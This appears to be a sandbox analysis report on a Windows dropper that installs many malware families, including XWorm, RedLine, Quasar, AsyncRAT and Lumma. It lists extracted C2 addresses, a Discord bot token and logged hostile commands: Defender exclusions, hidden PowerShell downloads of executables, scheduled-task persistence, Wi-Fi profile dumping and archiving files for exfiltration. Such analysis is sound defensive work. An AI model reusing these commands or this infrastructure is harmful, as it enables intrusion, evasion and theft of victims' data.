Resubmissions

16-12-2024 05:27

241216-f5kx6awmh1 10

14-12-2024 20:23

241214-y6jqlasrhy 10

14-12-2024 20:22

241214-y51bysvmbk 10

14-12-2024 20:13

241214-yzc98svkfr 10

14-12-2024 13:14

241214-qgw1masrcy 10

14-12-2024 13:12

241214-qfk7qsvlaq 3

12-12-2024 18:19

241212-wymq6ssnat 10

12-12-2024 18:16

241212-www7tssmet 10

Analysis

  • max time kernel
    1091s
  • max time network
    1204s
  • platform
    windows7_x64
  • resource
    win7-20241010-es
  • resource tags

    arch:x64arch:x86image:win7-20241010-eslocale:es-esos:windows7-x64systemwindows
  • submitted
    14-12-2024 20:23

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.141.26.234:7000

Mutex

2XLzSYLZvUJjDK3V

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Java Update (32bit).exe

aes.plain

Extracted

Family

redline

Botnet

fvcxcx

C2

185.81.68.147:1912

Extracted

Family

metasploit

Version

metasploit_stager

C2

176.122.27.90:8888

Extracted

Family

quasar

Version

1.4.1

Botnet

Windows Client

C2

148.163.102.170:4782

Mutex

4c18e02c-7c39-4a5e-bbef-16fe13828101

Attributes
  • encryption_key

    73B0A3AC50C78E243EA93BF9E60C9BC63D63CA26

  • install_name

    Sever Startup.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows Startup

  • subdirectory

    Windows Startup

Extracted

Family

redline

Botnet

eewx

C2

185.81.68.147:1912

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

82.64.156.123:80

Mutex

22fbcdf1-92c4-4afa-81b3-8940a1676372

Attributes
  • encryption_key

    030FEA14D8B12C3F86A426D37EB0940C8225BBC8

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

82.64.156.123:80

Mutex

9mzImB3NUR0Q

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

discordrat

Attributes
  • discord_token

    MTMxNTQxMDg0NDg3NTQ4OTI4MA.Gx5ptK.HY1OYsjGMP1MsOoyD2E7T9pCvkfHTdOPozmb_c

  • server_id

    1315411300192616569

Extracted

Family

lumma

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Discordrat family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Merlin

    Merlin is a cross-platform post-exploitation C2 framework written in golang.

  • Merlin family
  • Merlin payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Redline family
  • UAC bypass 3 TTPs 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Adds policy Run key to start application 2 TTPs 6 IoCs
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 16 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 30 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 35 IoCs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 21 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 5 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 19 IoCs
  • Runs ping.exe 1 TTPs 32 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      PID:2452
    • C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe
      "C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2304
    • C:\Users\Admin\AppData\Local\Temp\a\x.exe
      "C:\Users\Admin\AppData\Local\Temp\a\x.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\x.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1928
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:796
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2512
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1772
    • C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe
      "C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1596
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:988
    • C:\Users\Admin\AppData\Local\Temp\a\system32.exe
      "C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Users\Admin\AppData\Local\Temp\a\system32.exe
        "C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2828
    • C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572
    • C:\Users\Admin\AppData\Local\Temp\a\Update.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2616
    • C:\Users\Admin\AppData\Local\Temp\a\main.exe
      "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3100
      • C:\Users\Admin\AppData\Local\Temp\a\main.exe
        "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:3528
    • C:\Users\Admin\AppData\Local\Temp\a\tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\a\tmp.exe"
      2⤵
      • Executes dropped EXE
      PID:3180
    • C:\Users\Admin\AppData\Local\Temp\a\shost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:4484
      • C:\Users\Admin\AppData\Local\Temp\a\shost.exe
        "C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:5328
    • C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
      "C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:5596
      • C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
        "C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:6160
    • C:\Users\Admin\AppData\Local\Temp\a\phost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:6304
      • C:\Users\Admin\AppData\Local\Temp\a\phost.exe
        "C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:6408
    • C:\Users\Admin\AppData\Local\Temp\a\in.exe
      "C:\Users\Admin\AppData\Local\Temp\a\in.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:7052
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\642F.tmp\6430.tmp\6431.bat C:\Users\Admin\AppData\Local\Temp\a\in.exe"
        3⤵
          PID:1132
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1348
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2004
          • C:\Windows\system32\calc.exe
            calc.exe
            4⤵
              PID:1700
        • C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe
          "C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          PID:6460
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
            3⤵
            • Enumerates connected drives
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:6516
        • C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe
          "C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:1760
          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1592
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart
              4⤵
              • System Location Discovery: System Language Discovery
              PID:5024
        • C:\Users\Admin\AppData\Local\Temp\a\VipToolMeta.exe
          "C:\Users\Admin\AppData\Local\Temp\a\VipToolMeta.exe"
          2⤵
          • Executes dropped EXE
          PID:3700
          • C:\Windows\system32\schtasks.exe
            "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4052
          • C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe
            "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            PID:4456
            • C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4776
        • C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe
          "C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          PID:6004
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe"
            3⤵
            • Enumerates connected drives
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of FindShellTrayWindow
            PID:6248
        • C:\Users\Admin\AppData\Local\Temp\a\Out2.exe
          "C:\Users\Admin\AppData\Local\Temp\a\Out2.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:4360
          • C:\Users\Admin\AppData\Local\Temp\a\Out2.exe
            "C:\Users\Admin\AppData\Local\Temp\a\Out2.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4136
        • C:\Users\Admin\AppData\Local\Temp\a\null.exe
          "C:\Users\Admin\AppData\Local\Temp\a\null.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:4272
          • C:\Users\Admin\AppData\Local\Temp\a\null.exe
            "C:\Users\Admin\AppData\Local\Temp\a\null.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:3520
        • C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe
          "C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:4436
        • C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe
          "C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:4636
        • C:\Users\Admin\AppData\Local\Temp\a\ssg.exe
          "C:\Users\Admin\AppData\Local\Temp\a\ssg.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4652
        • C:\Users\Admin\AppData\Local\Temp\a\xx.exe
          "C:\Users\Admin\AppData\Local\Temp\a\xx.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4892
        • C:\Users\Admin\AppData\Local\Temp\a\cx.exe
          "C:\Users\Admin\AppData\Local\Temp\a\cx.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:5068
        • C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe
          "C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:5176
        • C:\Users\Admin\AppData\Local\Temp\a\dropper.exe
          "C:\Users\Admin\AppData\Local\Temp\a\dropper.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:5304
        • C:\Users\Admin\AppData\Local\Temp\a\tester.exe
          "C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:5772
          • C:\Users\Admin\AppData\Local\Temp\a\tester.exe
            "C:\Users\Admin\AppData\Local\Temp\a\tester.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3116
        • C:\Users\Admin\AppData\Local\Temp\a\ctx.exe
          "C:\Users\Admin\AppData\Local\Temp\a\ctx.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          PID:5948
          • C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
            "C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:6132
            • C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
              "C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
              4⤵
              • Executes dropped EXE
              PID:5352
              • C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
                "C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe"
                5⤵
                • Executes dropped EXE
                PID:6716
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
              4⤵
              • System Location Discovery: System Language Discovery
              PID:6760
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:6772
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  6⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:6796
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\692679935401_Desktop.zip' -CompressionLevel Optimal
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:7112
            • C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe
              "C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:7024
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2512
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                5⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:3252
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  6⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:3380
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\692679935401_Desktop.zip' -CompressionLevel Optimal
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3740
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
              4⤵
              • Blocklisted process makes network request
              • System Location Discovery: System Language Discovery
              PID:1640
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
              4⤵
              • Blocklisted process makes network request
              • System Location Discovery: System Language Discovery
              PID:2940
        • C:\Users\Admin\AppData\Local\Temp\a\vvv.exe
          "C:\Users\Admin\AppData\Local\Temp\a\vvv.exe"
          2⤵
          • Executes dropped EXE
          PID:5744
        • C:\Users\Admin\AppData\Local\Temp\a\connect.exe
          "C:\Users\Admin\AppData\Local\Temp\a\connect.exe"
          2⤵
          • Executes dropped EXE
          PID:672
        • C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe
          "C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe"
          2⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:4960
        • C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe
          "C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1336
        • C:\Users\Admin\AppData\Local\Temp\a\random.exe
          "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3800
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
            3⤵
              PID:6328
              • C:\Windows\system32\mode.com
                mode 65,10
                4⤵
                  PID:6960
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                  4⤵
                  • Executes dropped EXE
                  PID:3296
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_7.zip -oextracted
                  4⤵
                  • Executes dropped EXE
                  PID:5500
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_6.zip -oextracted
                  4⤵
                  • Executes dropped EXE
                  PID:3212
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_5.zip -oextracted
                  4⤵
                  • Executes dropped EXE
                  PID:2916
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_4.zip -oextracted
                  4⤵
                  • Executes dropped EXE
                  PID:5296
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_3.zip -oextracted
                  4⤵
                  • Executes dropped EXE
                  PID:5528
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_2.zip -oextracted
                  4⤵
                  • Executes dropped EXE
                  PID:3460
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_1.zip -oextracted
                  4⤵
                  • Executes dropped EXE
                  PID:4012
                • C:\Windows\system32\attrib.exe
                  attrib +H "in.exe"
                  4⤵
                  • Views/modifies file attributes
                  PID:6772
            • C:\Users\Admin\AppData\Local\Temp\a\client.exe
              "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
              2⤵
              • Executes dropped EXE
              PID:4068
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 4068 -s 644
                3⤵
                  PID:5460
              • C:\Users\Admin\AppData\Local\Temp\a\l4.exe
                "C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
                2⤵
                • Executes dropped EXE
                PID:5024
                • C:\Users\Admin\AppData\Local\Temp\onefile_5024_133786979071188000\l4.exe
                  C:\Users\Admin\AppData\Local\Temp\a\l4.exe
                  3⤵
                  • Executes dropped EXE
                  PID:5572
              • C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
                "C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
                2⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Program Files directory
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:5204
                • C:\Program Files\Windows Media Player\graph\graph.exe
                  "C:\Program Files\Windows Media Player\graph\graph.exe"
                  3⤵
                    PID:2832
                • C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
                  2⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:5616
                  • C:\Windows\system32\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                    3⤵
                      PID:5276
                      • C:\Windows\system32\mode.com
                        mode 65,10
                        4⤵
                          PID:6424
